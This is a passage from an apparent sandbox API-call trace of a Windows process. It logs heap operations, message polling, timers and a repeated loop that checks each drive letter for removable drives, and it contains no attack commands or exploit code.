hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.673] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.673] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.674] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0217.674] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.678] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.678] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.679] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.679] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.679] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.680] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.680] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.680] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.680] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.680] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.681] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.681] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.681] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.681] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.681] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.682] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.682] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.682] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.683] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.684] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.684] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.684] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0217.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0217.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.686] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.686] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.686] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.686] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.687] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.687] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.687] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.687] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.687] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.688] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.688] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.688] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.688] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.688] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.689] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.689] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.689] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.689] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.689] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.690] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.690] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.690] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.690] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.691] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.692] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.692] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.692] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.692] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.693] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.693] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.693] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.693] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0217.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0217.693] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0217.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.694] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.694] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0217.694] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.695] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.695] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.695] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.695] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.695] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.695] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.785] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.785] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.785] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.785] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.786] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.786] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.786] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.786] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.786] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.787] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.787] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.787] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.787] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.787] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.788] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.788] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.788] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.788] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.788] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.789] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.789] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.790] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.790] DispatchMessageW 